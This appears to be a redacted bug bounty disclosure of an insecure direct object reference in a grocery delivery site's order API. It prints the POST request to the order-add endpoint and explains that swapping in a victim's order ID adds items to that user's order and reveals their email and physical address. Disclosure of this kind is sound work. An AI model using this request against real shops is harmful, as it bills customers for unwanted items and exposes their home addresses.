The [██████) website allows users to place orders and modify them after they were placed.
To modify an order after it was placed, it must be in a state before the shopping is in progress. This allows customers to adjust an order before its final shipment
It is possible to add arbitrary products to another’s user’s order before it was placed. By sending the proper HTTP request, the content of the target order is also disclosed, including the victim user’s physical address.
For this Proof-of-Concept, the technical values were the following :
Key | Value |
---|---|
Attacker e-mail | ██████ |
Victim e-mail | ███ |
Attacker order ID | 1813918441 |
Victim order ID | 181396149 |
For the sake of simplicity, the adress was set to ███████ and the shop wasCVS ("store":{"store_id":60,"store_location_id":29244,"metro_id":210,"name":"CVS"
)
Once the orders are placed, proceed to step two.
POST /aviator/v2/orders/1813918441/add.json?anonymous_id███deac090c-2b05-4402-b33f-468060058145█████white_label_key████████shipt████████segway_version██████6668a3d631495cebf307423e23a588c5f9d929c1████zip█████████████user_id█████████████████████████metro_id█████████124███████store_id████████60██████bucket_number██████72███store_location_id██████████platform████████web HTTP/2
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/███████ Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q████████0.8,en-US;q█████0.5,en;q████████0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 154
Referer: ██████
Origin: █████████
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
X-Pwnfox-Color: blue
Authorization: ██████████
Te: trailers
{"zip":"████","user_id":█████,"metro_id":124,"store_id":60,"bucket_number":72,"store_location_id":██████,"products":[{"id":4799771,"qty":1,"note":""}]}
To perform the exploit, simply replace the order number in the URL with the order number of your victim. For instance here :
The server will indeed add the selected products in the victim’s cart and additionnally disclose the content of the cart and the customer’s e-mail address :
████████
Additionnally, by targeting other orders numbers, it is possible to disclose the status of orders numbers. For example :
The vulnerability described here has significant impacts on both the customers and the company, as it involves the manipulation of orders and the exposure of sensitive customer information.
Indeed, the exploit both discloses user’s physical address as well as having them billed for unwanted items.
However the business impacts of the vulnerability can go quite beyond this scope. Indeed, customers who fall victim to the attack will be billed for unwanted items, leading to financial loss for them. Additionally, the company may have to issue refunds or compensate customers, resulting in financial losses for the company. Similarly, this could also impact the smooth running of deliveries from an operational point of view.
From a reputational perspective, customers who have been affected by the attack may lose trust in the company and its ability to protect their personal and financial information. This could result in negative reviews, decreased sales, and a damaged reputation for the company.
For the physical address, this also adds addtional personal safety concerns.